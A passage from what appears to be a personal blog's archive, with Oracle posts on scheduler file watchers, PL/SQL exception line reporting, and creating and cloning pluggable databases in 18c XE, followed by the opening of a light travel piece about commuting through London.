        comments => 'Credentials for file watcher on IN_FILES directory');
 end;
 /

…replacing “a-fiendishly-difficult-to-guess-password” with the password we set for ponsonby.

We can now see our credential in USER_SCHEDULER_CREDENTIALS :

select credential_name, username, comments
from user_scheduler_credentials
where credential_name = 'CAPTION_CRED'
/



CREDENTIAL_NAME USERNAME   COMMENTS                                          
--------------- ---------- --------------------------------------------------
CAPTION_CRED    ponsonby   Credentials for file watcher on IN_FILES directory

Right, now that’s all sorted we can…

Create a File Watcher

To start with we’re going to look for files called captionsomething.txt :

begin
    dbms_scheduler.create_file_watcher(
        file_watcher_name => 'caption_competition_fw',
        directory_path => '/home/ponsonby/in_files',
        file_name => 'caption*.txt',
        credential_name => 'fw_credential',
        enabled => false,
        comments => 'Watching for "witty" captions');
end;
/

Note that we’ve created the filewatcher in a disabled state at the moment, as we can see here :

select enabled, directory_path, file_name, 
    credential_name, comments
from user_scheduler_file_watchers
where file_watcher_name = 'CAPTION_COMP_FW'
/



ENABLED    DIRECTORY_PATH            FILE_NAME       CREDENTIAL_NAME COMMENTS                                          
---------- ------------------------- --------------- --------------- --------------------------------------------------
FALSE      /home/ponsonby/in_files   caption*.txt    CAPTION_CRED    Watching for "witty" captions                     

This is because we’ve still got to create all the other stuff we need for it to do anything useful.
Speaking of which…

Yes, that is my Death Star parked outside

When the file watcher runs it will return an object of type SCHEDULER_FILEWATCHER_RESULT.
We’re going to take the scalar properties of that object and dump them into a table :

create table incoming_files(
    destination VARCHAR2(4000),
    directory_path VARCHAR2(4000),
    actual_file_name VARCHAR2(4000),
    file_size NUMBER,
    file_timestamp TIMESTAMP WITH TIME ZONE)
/    

…using this stored procedure :

create or replace procedure save_incoming_file( i_result sys.scheduler_filewatcher_result)
as
begin
    insert into incoming_files( 
        destination, 
        directory_path, 
        actual_file_name, 
        file_size, 
        file_timestamp)
    values(
        i_result.destination,
        i_result.directory_path,
        i_result.actual_file_name,
        i_result.file_size,
        i_result.file_timestamp);
end;
/

NOTE – when this gets executed from the scheduler job, the transaction will commit.
You do not need to do this explicitly. Additionally if you attempt to use an autonomous transaction, your change is likely to disappear into the ether.

We need a means of calling this stored procedure when the filewatcher is triggered. This requires two further objects…

The Dentist will see you now

First, we need a scheduler program, which we’ll use to call the procedure. As we want to read the output of the filewatcher, we’ll need to add an argument to the program.
Then, we’ll create a scheduler job to tie the program to the file watcher.
I know, let’s do all of that in one fell swoop :

begin
    dbms_scheduler.create_program(
        program_name => 'caption_prog',
        program_type => 'stored_procedure',
        program_action => 'save_incoming_file',
        number_of_arguments => 1,
        enabled => false);
        
    -- need to make sure this program can see the message sent by the filewatcher...
    dbms_scheduler.define_metadata_argument(
        program_name => 'caption_prog',
        metadata_attribute => 'event_message',
        argument_position => 1);
        
    -- Create a job that links our filewatcher to our program...
    dbms_scheduler.create_job(
        job_name => 'caption_job',
        program_name => 'caption_prog',
        event_condition => null,
        queue_spec => 'caption_comp_fw',
        auto_drop => false,
        enabled => false);
end;
/

We can now see the program is in the data dictionary…

select program_type, program_action, number_of_arguments,
    enabled
from user_scheduler_programs
where program_name = 'CAPTION_PROG'
/


PROGRAM_TYPE         PROGRAM_ACTION       NUMBER_OF_ARGUMENTS ENABLED   
-------------------- -------------------- ------------------- ----------
STORED_PROCEDURE     save_incoming_file                     1 FALSE     

…along with the job…

select program_name, schedule_type, file_watcher_name,
    enabled
from user_scheduler_jobs
where job_name = 'CAPTION_JOB'
/

PROGRAM_NAME         SCHEDULE_TYPE        FILE_WATCHER_NA ENABLED   
-------------------- -------------------- --------------- ----------
CAPTION_PROG         FILE_WATCHER         CAPTION_COMP_FW FALSE     

Now we’ve created all of the components, we can enable everything :

begin
    dbms_scheduler.enable('caption_comp_fw');
    dbms_scheduler.enable('caption_prog');
    dbms_scheduler.enable('caption_job');
end;
/

To confirm everything in our stack is enabled :

select file_watcher_name as scheduler_object, enabled
from user_scheduler_file_watchers
where file_watcher_name = 'CAPTION_COMP_FW'
union all
select program_name, enabled
from user_scheduler_programs
where program_name = 'CAPTION_PROG'
union all
select job_name, enabled
from user_scheduler_jobs
where program_name = 'CAPTION_PROG'
and file_watcher_name = 'CAPTION_COMP_FW'
/


SCHEDULER_OBJECT               ENABLED             
------------------------------ --------------------
CAPTION_COMP_FW                TRUE                
CAPTION_PROG                   TRUE                
CAPTION_JOB                    TRUE                

Test

To test it, we need to create a file with an appropriate name in the directory we’re watching :

cd /home/ponsonby/in_files
sudo su ponsonby
echo "Inside every old person is a young person wondering what happened.">caption01.txt

You’ll need to give it a minute from the file creation to the job running.

As this is a scheduler job, you can check how the run went in the usual places :

select log_id, job_name, log_date, status
from user_scheduler_job_log
where job_name = 'CAPTION_JOB'
/


    LOG_ID JOB_NAME                       LOG_DATE                            STATUS         
---------- ------------------------------ ----------------------------------- ---------------
     27010 CAPTION_JOB                    28-SEP-20 20.51.01.508628000 +01:00 SUCCEEDED      

For further details :

select job_name, run_duration, status,
    error#, additional_info, errors
from user_scheduler_job_run_details
where log_id = 27010
/

JOB_NAME                       RUN_DURATION        STATUS              ERROR# ADDITIONAL_INFO      ERRORS              
------------------------------ ------------------- --------------- ---------- -------------------- --------------------
CAPTION_JOB                    +00 00:00:00.000000 SUCCEEDED                0                                          

Of course, the important bit here is what, if anything, has been inserted into the table :

select destination, directory_path, actual_file_name,
    file_size, file_timestamp
from incoming_files
/

DESTINATION     DIRECTORY_PATH            ACTUAL_FILE_NAM  FILE_SIZE FILE_TIMESTAMP                  
--------------- ------------------------- --------------- ---------- --------------------------------
localhost       /home/ponsonby/in_files   caption01.txt           67 28-SEP-20 19.49.23.000000000 GMT


Wait for it !

All of this is fine if you want to process a small file, or even use it solely as a trigger to kick something off, but what about a larger file or, at least, one that takes more than a few seconds to transfer into the directory we’re watching ?

Fortunately, we can use the filewatcher’s steady_state_duration parameter to specify a minimum time the filewatcher should wait after the file is last written to before it considers the file to have arrived :

begin
    dbms_scheduler.set_attribute(
        name => 'caption_comp_fw',
        attribute => 'steady_state_duration',
        value => interval '20' second);
end;
/

To confirm the change :

select steady_state_duration
from user_scheduler_file_watchers
where file_watcher_name = 'CAPTION_COMP_FW'
/


STEADY_STATE_DURATION         
------------------------------
+00 00:00:20.000000

This means that the filewatcher should now wait until a file has not changed for 20 seconds before it kicks anything off.
Note that the steady_state_duration must be set to a value less than the interval at which the file watchers are set to poll ( 1 minute in our case).

Just as well as we’ve added a table to our application…

create table captions( 
    file_name varchar2(4000),
    caption_text varchar2(4000))
/

…and made some changes to the procedure we’re calling…

create or replace procedure save_incoming_file( i_result sys.scheduler_filewatcher_result)
as
    fh utl_file.file_type;
    buffer varchar2(4000);
    
    fname varchar2(4000);
    C_DIR constant all_directories.directory_name%type := 'IN_FILES';
begin
    insert into incoming_files( 
        destination, 
        directory_path, 
        actual_file_name, 
        file_size, 
        file_timestamp)
    values(
        i_result.destination,
        i_result.directory_path,
        i_result.actual_file_name,
        i_result.file_size,
        i_result.file_timestamp);

    fname := i_result.actual_file_name;
    fh := utl_file.fopen(C_DIR, fname, 'R');
    
    loop
        begin -- nested block to read the file
            utl_file.get_line(fh, buffer);    
            if buffer is null then
                exit;
            end if;
            insert into captions( file_name, caption_text)
            values( fname, buffer); 
        exception when no_data_found then
            -- no more data to read
            exit;
        end; -- file read block
    end loop;
    utl_file.fclose(fh);
end;
/

Now we just need something to create our file…slowly. In my case I’m using this bash script ( running as ponsonby from /home/ponsonby) :

#!/bin/sh
outfile='in_files/caption02.txt'
echo 'Dress-down day at the Sith Order' >$outfile
sleep 19
echo 'Tall...and handsome (in the dark)'>>$outfile
exit

Once this has completed, we can check our application and confirm that the filewatcher has found the file…

select actual_file_name, file_size, file_timestamp 
from incoming_files
where actual_file_name = 'caption02.txt'
/

ACTUAL_FILE_NAME      FILE_SIZE FILE_TIMESTAMP                  
-------------------- ---------- --------------------------------
caption02.txt                67 29-SEP-20 20.47.21.000000000 GMT

…and waited long enough for it to finish being written before processing it…

select caption_text 
from captions
where file_name = 'caption02.txt'
/


CAPTION_TEXT                                                
------------------------------------------------------------
Dress down day at the Sith Order
Tall...and handsome( in the dark)

Acknowledgements

As ever Oracle Base was a veritable font of wisdom on the issue of file watchers.

I also found lots of useful info in Aychin’s Oracle RDBMS Blog.
Finally, this Stack Exchange article was invaluable in solving the mystery of *nix directory permissions.

Time flies when you’re having fun – The truth about Oracle Exception handlers (this week)

Fri, 2020-07-10 14:22

Oracle Twitter is a bit like Poker – you tend to take notice when Aces turn up.
I mention this because I’m indebted to Jacek Gebal, Sabine Heismath and Andy Sayer, whose discussion on this topic alerted me to the fact that PL/SQL exception handling had changed in a small but important way whilst I wasn’t looking.

Just in case you’re wondering whether that opening paragraph is a prelude to a post containing gratuitous references to a certain Motorhead song, all I can say is…if you like to gamble…

How things were

Consider this procedure :

create or replace procedure deal_em( i_card in varchar2)
as
begin
    if i_card in ('7', '11') then
        raise_application_error(-20000, 'Snake eyes watching you');
    elsif upper(i_card) = 'JOKER' then
        raise_application_error(-20001, q'[Don't forget the Joker]');
    elsif upper(i_card) = 'ACE OF SPADES' then
        dbms_output.put_line('The only card I need !');
    else
        raise_application_error(-20002, q'[I'm a shade of green]');
        dbms_output.put_line('Card is '||i_card);
    end if;    
exception when others then
    -- I'll see your application error and raise you...
    raise;
end;
/

As I observed some years ago, back in the days of 11g and before PL/SQL programmers could entertain themselves for hours by playing hunt the exception…

SQL> exec deal_em('7')
BEGIN deal_em('7'); END;

*
ERROR at line 1:
ORA-20000: Snake eyes watching you
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at line 1


SQL> exec deal_em('Joker')
BEGIN deal_em('Joker'); END;

*
ERROR at line 1:
ORA-20001: Don't forget the Joker
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at line 1


SQL> exec deal_em('2')
BEGIN deal_em('2'); END;

*
ERROR at line 1:
ORA-20002: I'm a shade of green
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at line 1

Read ’em and weep, three different exceptions but all of them are reported at line 16.

From 12cR2 onward (thanks Phil Goldenberg) however, some clever people at Oracle seem to have been pushing up the ante…

SQL> exec deal_em('7') 
BEGIN deal_em('7'); END;

*
ERROR at line 1:
ORA-20000: Snake eyes watching you
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at "MIKE.DEAL_EM", line 5
ORA-06512: at line 1


SQL> exec deal_em('Joker')
BEGIN deal_em('Joker'); END;

*
ERROR at line 1:
ORA-20001: Don't forget the Joker
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at "MIKE.DEAL_EM", line 7
ORA-06512: at line 1


SQL> exec deal_em('2')
BEGIN deal_em('2'); END;

*
ERROR at line 1:
ORA-20002: I'm a shade of green
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at "MIKE.DEAL_EM", line 11
ORA-06512: at line 1

Yep, right there at the bottom of the error stack is the line number from which the error originated.
There you have it, PL/SQL exceptions are now rather easier to pinpoint.
Oh, and gambling’s for fools.

Making the most of Oracle 18c XE – Pluggable Databases and the Oracle Eco-System

Fri, 2020-06-26 12:41

This was going to be a simple post about creating multiple Pluggable Databases (PDBs) in Oracle 18cXE.
But you know what it’s like, you get your lego database set out and then you spot those unusual shaped bricks… and the transparent ones… oh, that one has a wheel on…and get a bit carried away.
What follows is a guide on how to create three concurrent PDBs on an Oracle 18cXE database. However, I have taken the opportunity to investigate other areas of the Express Edition platform and so will be making use of Advanced Compression as well as Oracle Enterprise Manager Express.
In fact, I wouldn’t be surprised if SQLDeveloper put in an appearance as well.
I’ve also included a couple of the more notable members of Oracle’s small-but-perfectly-formed eco-system into the final design. On top of all that, I’ll be performing a magic trick to ensure that I only have to install each piece of software once, even though it may end up in multiple PDBs…

The Environment

The server we’ll be working on is running CentOS7.
It also has an Oracle 18cXE instance which has been newly installed following these steps.

Remote connection to the Container Database’s (CDB) Oracle Enterprise Manager Express instance is possible because we’ve run :

exec dbms_xdb_config.SetListenerLocalAccess(false);

Remote connection via TNS is possible provided the client from which we’re connecting has the following tnsnames.ora entry for it :

  XE =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = myserver.mydomain)(PORT = 1521))
      (CONNECT_DATA =
        (SERVER = DEDICATED)
        (SERVICE_NAME = XE)
      )
    )

…where myserver.mydomain is the address of the server.

When connected to the CDB as SYSTEM, we can see that we currently have two PDBS :

select sys_context('userenv', 'con_name') from dual;

SYS_CONTEXT('USERENV','CON_NAME')
--------------------------------------------------------------------------------
CDB$ROOT

select con_id, pdb_name, status
from dba_pdbs;

    CON_ID PDB_NAME			  STATUS
---------- ------------------------------ ----------
	 3 XEPDB1			  NORMAL
	 2 PDB$SEED			  NORMAL

Now, we know that the maximum number of PDBs allowed in 18cXE is three. However, this would appear to exclude the PDB$SEED database.

The Target Environment

I want to end up with three PDBS – one for Development, one for test and one for production.
As I’m doing a bit of “magic” I have borrowed the unofficial motto of the Unseen University to use as the naming convention for my PDBs.
Wizards are renowned for their big dinners and their motto is “Eta Beta Pi” ( Eat a Better Pie).
Wizards are not renowned for their punning.
Anyhow once I’ve finished, I’d like my PDBs to be configured as follows :

  • ETA (Development) – including the OraOpenSource Logger and utPLSQL test framework
  • BETA (Test) – OraOpenSource Logger and utPLSQL installed
  • PI (Production) – OraOpenSource Logger only

All PDBs should have a USERS tablespace in which compression is enabled by default.
Before we go and create any databases though, we need to get rid of the existing XEPDB1 PDB…

Dropping a PDB

Now, we could re-purpose and rename XEPDB1, but as it’s currently empty it’s probably easier just to drop it.

At the moment, we can see that this PDB has the following datafiles :

select df.name
from v$datafile df
inner join dba_pdbs pdb
    on pdb.con_id = df.con_id
    and pdb.pdb_name = 'XEPDB1';

NAME
--------------------------------------------------------------------------------
/opt/oracle/oradata/XE/XEPDB1/system01.dbf
/opt/oracle/oradata/XE/XEPDB1/sysaux01.dbf
/opt/oracle/oradata/XE/XEPDB1/undotbs01.dbf
/opt/oracle/oradata/XE/XEPDB1/users01.dbf

We want to get rid of these when we drop the PDB.

The PDB is currently open…

select name, open_mode
from v$pdbs
where name = 'XEPDB1'

NAME			       OPEN_MODE
------------------------------ ----------
XEPDB1			       READ WRITE

…so we need to connect as a user with the ALTER DATABASE and CREATE PLUGGABLE DATABASE privileges.

We can then close the PDB…

alter pluggable database xepdb1 close;

…and verify that it’s state has changed…

select open_mode
from v$pdbs
where name = 'XEPDB1';

OPEN_MODE
----------
MOUNTED

…before finally dropping it…

drop pluggable database xepdb1 including datafiles;

The PDB has now been removed…

select con_id, pdb_name, status
from dba_pdbs;

    CON_ID PDB_NAME			  STATUS
---------- ------------------------------ ----------
	 2 PDB$SEED			  NORMAL

…along with all of the datafiles…

ls -l /opt/oracle/oradata/XE/XEPDB1/
total 0

Now we’ve made a bit of space PDB wise, it’s time to…

Create a PDB from a Seed Database

I’m going to start by creating what will become my Production database (PI).
Speaking of Wizards, we’re going utilise the one in Enterprise Manager Express to do this.

To begin with, we need to connect to EM Express :

Hot Tip – don’t do what I did and connect as SYSTEM if you want to open the PDB once it’s been created ! Use an account with the ALTER DATABASE privilege.

Navigate to the Containers page

In the Containers section of the page choose Create from the Actions menu.

The wizard should now appear

On the General Page (first page) of the Create PDB From Seed wizard, supply values for the following :
PDB Name : pi
Username : pdbadmin
Password : a password for pdbadmin
Confirm password :

Incidentally, you can see the code that will be executed by EM Express if you click the Show SQL button.
In my case this is :

create pluggable database "PI" admin user "PDBADMIN" identified by **********  file_name_convert = ('/opt/oracle/oradata/XE/pdbseed/', '/opt/oracle/product/18c/dbhomeXE/XE/datafile/pi/');

alter pluggable database "PI" open read write;

-- declare bind variables
var b1 varchar2(4000);
var b2 varchar2(4000);
var b3 number;
var b4 number;
var b5 number;
var b6 number;
var b7 number;

-- init bind values 
exec :b1 := 'DEFAULT_CDB_PLAN';
exec :b2 := 'pi';
exec :b3 := 1;
exec :b4 := 100;
exec :b5 := 100;
exec :b6 := ;
exec :b7 := ;

begin
     sys.dbms_resource_manager.clear_pending_area();
     sys.dbms_resource_manager.create_pending_area();
     sys.dbms_resource_manager.create_cdb_plan_directive(
       plan                  => :b1,
       pluggable_database    => :b2,
       shares                => :b3,
       utilization_limit     => :b4,
       parallel_server_limit => :b5,
       memory_min            => :b6,
       memory_limit          => :b7);
       sys.dbms_resource_manager.validate_pending_area();
       sys.dbms_resource_manager.submit_pending_area();
   end;
/;

Some of that may change as we press on through the wizard. Click the Next arrow :


Right arrow click to go to storage page :

In our case accept datafile location defaults, and unlimited storage so no changes here.
Click the next arrow again, and we’ll have the chance to edit the default Resource Limits :

Once again, no changes are required in my case.

Finally, I’m going to click OK…and realise my mistake connecting as SYSTEM

On the plus side, it’s not too serious. The PDB has been created…

select con_id, pdb_name, status
from dba_pdbs
order by con_id;

    CON_ID PDB_NAME			  STATUS
---------- ------------------------------ ----------
	 2 PDB$SEED			  NORMAL
	 3 PI				  NEW

…it’s just not currently open…

select open_mode
from v$pdbs
where name = 'PI'
/

OPEN_MODE
----------
MOUNTED

To remedy this, I simply need to connect as a user with ALTER DATABASE and open the offending PDB.
As I have a brand new Database and I’m the DBA I’m going to connect as SYS as SYSDBA and run :

alter pluggable database pi open read write;

…which should yield the message…

Pluggable database altered.

…signalling that PI is open…

select open_mode
from v$pdbs
where name = 'PI';

OPEN_MODE
----------
READ WRITE

PI has the following datafiles :

select df.name
from v$datafile df
inner join dba_pdbs pdb
    on pdb.con_id = df.con_id
    and pdb.pdb_name = 'PI'
/

NAME
--------------------------------------------------------------------------------
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/system01.dbf
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/sysaux01.dbf
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/undotbs01.dbf

One for each of the three non-temporary tablespaces created…

alter session set container = pi;

select tablespace_name, status, contents
from dba_tablespaces;

TABLESPACE_NAME 	       STATUS	 CONTENTS
------------------------------ --------- ---------------------
SYSTEM			       ONLINE	 PERMANENT
SYSAUX			       ONLINE	 PERMANENT
UNDOTBS1		       ONLINE	 UNDO
TEMP			       ONLINE	 TEMPORARY
Creating the USERS tablespace

We want to add a tablespace called USERS to hold any application data. So, as a user with ALTER DATABASE, make sure we’re connected to the correct container…

alter session set container = pi;

select sys_context('userenv', 'con_name') from dual;

…and run…

create tablespace users 
    datafile '/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/users01.dbf' size 512M autoextend on
/
    
alter tablespace users default table compress for oltp;

This should result in a tablespace with a default table compression value set to ENABLED :

select tablespace_name, def_tab_compression
from dba_tablespaces;

TABLESPACE_NAME                DEF_TAB_
------------------------------ --------
SYSTEM                         DISABLED
SYSAUX                         DISABLED
UNDOTBS1                       DISABLED
TEMP                           DISABLED
USERS                          ENABLED 

…and a new datafile…

select df.name
from v$datafile df
inner join dba_pdbs pdb
    on pdb.con_id = df.con_id
    and pdb.pdb_name = 'PI'
/ 

NAME                                                                            
--------------------------------------------------------------------------------
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/system01.dbf                    
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/sysaux01.dbf                    
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/undotbs01.dbf                   
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/users01.dbf    
Setting the default tablespace

At present, the default tablespace in PI is SYSTEM :

select property_value
from database_properties
where property_name = 'DEFAULT_PERMANENT_TABLESPACE'
/

PROPERTY_VALUE                                                                  
--------------------------------------------------------------------------------
SYSTEM                                                                          

We want to change this to USERS, so …

alter pluggable database default tablespace users;

Pluggable database altered.

select property_value
from database_properties
where property_name = 'DEFAULT_PERMANENT_TABLESPACE'
/

PROPERTY_VALUE                                                                  
--------------------------------------------------------------------------------
USERS                                                                           
Ensuring the database starts on reboot

As a final piece of database administration, we want to make sure that PI starts when the instance does. To do this, we need to make sure that the PDB is open…

select open_mode
from v$pdbs
where name = 'PI';  
  
OPEN_MODE
----------
READ WRITE

…and then save the PDB’s state :

alter pluggable database pi save state;
Installing OraOpenSource Logger

I’ve setup a tns entry in the tnsnames.ora on my client machine. You’ll notice that it’s almost identical to the one for the CDB, with only the name of the entry itself and the service_name changed to the name of the new PDB :

  PI =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = myserver.mydomain)(PORT = 1521))
      (CONNECT_DATA =
        (SERVER = DEDICATED)
        (SERVICE_NAME = PI)
      )
    )

…where myserver.mydomain is the address of the server.

I’ve downloaded the zip for OraOpenSource Logger v 3.11 from Github and extracted it onto my client machine.
I now navigate to the main directory and connect to the database as system:

cd logger311
sqlplus system@pi

NOTE – if you have not yet setup remote connections and you want to perform this installation from the server then download and extract the zip file to the server itself. Then, navigate to the logger311 directory and connect to the database using :

sqlplus system@localhost:1521/pi 

Either way, once you’re connected you can run the creation script for Logger owner schema.
You will be prompted for a schema name, default tablespace and password. Remember the username and password you select because you’ll need them in a moment…

@create_user.sql

Name of the new logger schema to create       [LOGGER_USER] : 
Tablespace for the new logger schema           [USERS] : 
Temporary Tablespace for the new logger schema  [TEMP] : 
Enter a password for the logger schema              [] :       

User created.


User altered.


Grant succeeded.



LOGGER_USER user successfully created.
Important!!! Connect as the LOGGER_USER user and run the logger_install.sql script.

Disconnected from Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production
Version 18.4.0.0.0

Now, we need to connect as the user we’ve just created ( LOGGER_USER in this case) and run :

@logger_install.sql

This will result in a number of actions concluding with :

*************************************************
Now executing LOGGER.STATUS...

Project Home Page        : https://github.com/oraopensource/logger/
Logger Version           : 3.1.1
Debug Level              : DEBUG
Capture Call Stack       : TRUE
Protect Admin Procedures : TRUE
APEX Tracing             : Disabled
SCN Capture              : Disabled
Min. Purge Level         : DEBUG
Purge Older Than         : 7 days
Pref by client_id expire : 12 hours
For all client info see  : logger_prefs_by_client_id


PL/SQL procedure successfully completed.

*************************************************

PL/SQL procedure successfully completed.


View altered.

NOTE – once we get some application owning schemas we’ll need to grant Logger objects to them.
This can be done by running the following as the logger owner :

@scripts/grant_logger_to_user.sql <username> 

…where username is the schema to whom you wish to grant logger.

Once this has run, you can then run the following as the granted user :

@scripts/create_logger_synonyms.sql <logger owner>

…where logger owner is the name of the Logger application owner schema.

Just as an aside, we can see that the logger tables have inherited the default compression settings for the USERS tablespace in which they have been created :

select table_name, compression, compress_for
from dba_tables
where owner = 'LOGGER_USER'
order by 1;

TABLE_NAME                     COMPRESS COMPRESS_FOR                  
------------------------------ -------- ------------------------------
LOGGER_LOGS                    ENABLED  ADVANCED                      
LOGGER_LOGS_APEX_ITEMS         ENABLED  ADVANCED                      
LOGGER_PREFS                   ENABLED  ADVANCED                      
LOGGER_PREFS_BY_CLIENT_ID      ENABLED  ADVANCED         

Finally, we have our Production PDB configured. That was a fair bit of work though, and we still have another two PDBs to create.
Fortunately, we can save ourselves some time and effort by…

Cloning a PDB

Next, I want to create my Test PDB ( BETA). As with PI, it needs to have OOS Logger installed and have a USERS tablespace with the same characteristics.
We can achieve this with rather less typing that you might expect simply by cloning the PI PDB.

To do this, we need to be connected as a user with ALTER DATABASE and CREATE PLUGGABLE DATABASE privileges ( I’m using SYS as SYSDBA here).

To start with we need to ensure that PI is in Read-Only mode in order to clone it. So, we check it’s current mode…

select open_mode
from v$pdbs
where name = 'PI';

OPEN_MODE 
----------
READ WRITE

OK, so we need to put the PDB into read only mode…

alter pluggable database pi close;
alter pluggable database pi open read only;

select open_mode
from v$pdbs
where name = 'PI';

OPEN_MODE 
----------
READ ONLY 

…and then clone it…

create pluggable database beta from pi
    file_name_convert = (
        '/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI', 
        '/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA')
/

Pluggable database created.

We can confirm that the PDB has been created ( it will have a status of “NEW” until it is opened for the first time) :

select pdb_name, status
from dba_pdbs;

PDB_NAME                       STATUS    
------------------------------ ----------
BETA                           NEW       
PDB$SEED                       NORMAL    
PI                             NORMAL    

We can also verify that the datafiles have been created in line with the FILE_NAME_CONVERT clause of the CREATE PLUGGABLE DATABASE command we issued :

select df.name
from v$datafile df
inner join dba_pdbs pdb
	 on pdb.con_id = df.con_id
	 and pdb.pdb_name = 'BETA'
/

NAME                                                                            
--------------------------------------------------------------------------------
/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA/system01.dbf                  
/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA/sysaux01.dbf                  
/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA/undotbs01.dbf                 
/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA/users01.dbf  

At the moment, both of our PDBs are READ ONLY :

select name, open_mode
from v$pdbs
/

NAME                           OPEN_MODE 
------------------------------ ----------
PDB$SEED                       READ ONLY 
PI                             READ ONLY 
BETA                           MOUNTED   

To open them :

alter pluggable database all except pdb$seed open read write force;

If we switch to BETA, we can see that OOS Logger has been copied from PI and is already installed :

alter session set container = beta;

select object_type, count(object_name)
from dba_objects
where owner = 'LOGGER_USER'
group by object_type
order by 2 desc;

OBJECT_TYPE             COUNT(OBJECT_NAME)
----------------------- ------------------
INDEX                                    8
TABLE                                    4
VIEW                                     3
SEQUENCE                                 2
TRIGGER                                  2
JOB                                      2
LOB                                      2
PROCEDURE                                1
PACKAGE BODY                             1
PACKAGE                                  1

10 rows selected. 

We need to make sure that Beta starts on database startup :

alter pluggable database beta save state;
Installing utPLSQL

Remember that BETA is to be our Test environment and we want to install the utPLSQL PL/SQL testing framework.
First, we need to download the latest version from here ( 3.1.10 at the time of writing).
Once we’ve extracted the zip, we need to follow the installation instructions so…

conn sys@beta as sysdba
@install_headless_with_trigger.sql 

This creates a schema called UT3 which contains the framework objects :

select object_type, count(object_name)
from dba_objects
where owner = 'UT3'
group by object_type
order by 2 desc; 

OBJECT_TYPE             COUNT(OBJECT_NAME)
----------------------- ------------------
TYPE                                   112
TYPE BODY                               78
INDEX                                   53
TABLE                                   30
PACKAGE                                 25
PACKAGE BODY                            25
SYNONYM                                 15
LOB                                     11
SEQUENCE                                 4
TRIGGER                                  1

10 rows selected. 

As before, we can confirm that this software exists only in this PDB :

alter session set container=cdb$root;

select username
from dba_users
where oracle_maintained = 'N';

no rows returned
Cloning a database using SQLDeveloper

If you prefer a more pointy/clicky variation on the theme of PDB cloning then SQLDeveloper is on hand to help (I’m using version 19.2 here).

Once you’ve started SQLDeveloper, from the View menu select DBA

If you don’t already have a connection to your CDB in the DBA Navigator window, add one using the green plus icon.

Now, expand the Connections tree and then the Container Database node and select the BETA node

From the Actions dropdown, select Clone PDB :

This will open the Clone Pluggable Database window :

  1. Enter the name of the PDB we want to create (ETA in our case)</li<
  2. File Name Conversions : Select Custom Names from the drop-down.
    You should see that the Target files are going to be written to a directory named after the new PDB
  3. KeyStorePassword : leave blank
  4. Check Open Automatically

The window should now look like this :

If you click on the SQL tab, we should see the code that SQLDeveloper is planning to run based on our selections :

Go back to the Properties Tab and click Apply

We can see that we now have a node for the new PDB :

Simple things please simple minds :

By now it’s no surprise that the new PDB has the same non-oracle users as the PDB we’ve cloned :

Remember to ensure db will open on restart :

alter pluggable database eta save state;

Three databases for the price of one. That should keep me quiet for a bit.

Acknowledgements

As is so often the case, I found what I was looking for in an OracleBase article.

The answer to this AskTom question was also rather helpful in explaining why my PDBs weren’t starting when the database was.

My Commute through London

Tue, 2020-06-09 14:18

Don’t worry. The title isn’t an oblique reference to something technical so I’m not going to let you get halfway down the page and then start writing some indecipherable computer code.
Also, if you happen to be my Dad, some of what follows may be familiar as you grew up around here.
If you’re not then you’re not obliged to laugh at any gags I’ve worked in because they’re mainly for his benefit.

We’re going to go on a quick (pre-lockdown) tour through history and legend, following the route of what, until fairly recently, was my daily commute across London before catching the train to Milton Keynes. More or less.
Look, to be completely honest we may be taking a couple of detours along the way. If your searching for the quickest route from Canary Wharf to Euston, well this may not be it.
Neither will we be paying too much attention to of some of the more famous landmarks that London has to offer.
Instead, we’ll be using the Tube Network to bounce back and forth through the centuries like a joyride in a TARDIS, taking a look at some of the City’s less obvious historical sites along the way.
Incidentally, if that idea does take your fancy, there’s a TARDIS parked in Earl’s Court Road.

Docklands

Our journey begins in the East of the City.
30 years ago, London’s Docklands were just a another post-industrial wasteland. Since then, a new Financial District has arisen phoenix-like from the ruins. Canary Wharf now contains the UK Headquarters of a number of Financial institutions.

At it’s centre stands the skyscraper known as Canary Wharf Tower, or One Canada Square to give it it’s proper title.
Until the Shard came along, it was the tallest building in the United Kingdom.

A large erection in the middle of the Financial District. Who’d have thought ?

From here, we need to head west. We could opt to descend into the bowels of the earth and catch a Jubilee Line tube into the centre of the City.
Alternatively, we could wander over to the Crossrail Terminal and get there even quicker on the Elizabeth Line…well, maybe next year we can.
The Terminal itself is built and contains numerous shops, restaurants and even a roof garden. All that’s missing are the trains. They’ll be along soon. Well, soonish.

End on, the Terminal looks a bit like something that Thunderbird 2 would carry. You can just imagine the lower half opening to form a ramp for Thunderbird 4 to slide down silently into the murky waters of West India Quay…

THUNDERBIRDS ARE…running a replacement bus service

For now however, we’ll need to make use of an elevated section of the Docklands Light Railway (DLR) to carry us into the heart of the “Old” City.

The first calling point of note is Limehouse, which once formed part of the Parliamentary Constituency represented by Clement Attlee – Prime Minister from 1945 to 1951.
Attlee is remembered as one of (if not the) greatest peacetime Prime Ministers, largely due to his government’s creation of the Welfare State. Indeed, the National Health Service created in 1948 is one of the few things that Brits can still agree on as being a rather good idea.

One station further up the line we shift back about a decade into the midst of the Depression…

Just around the corner from Shadwell Station is Cable Street. The Legend of The Battle of Cable Street is that the working class residents of the area banded together and fought a battle which caused the Fascists to abandon their provocative plans to march through the heart of the East End.
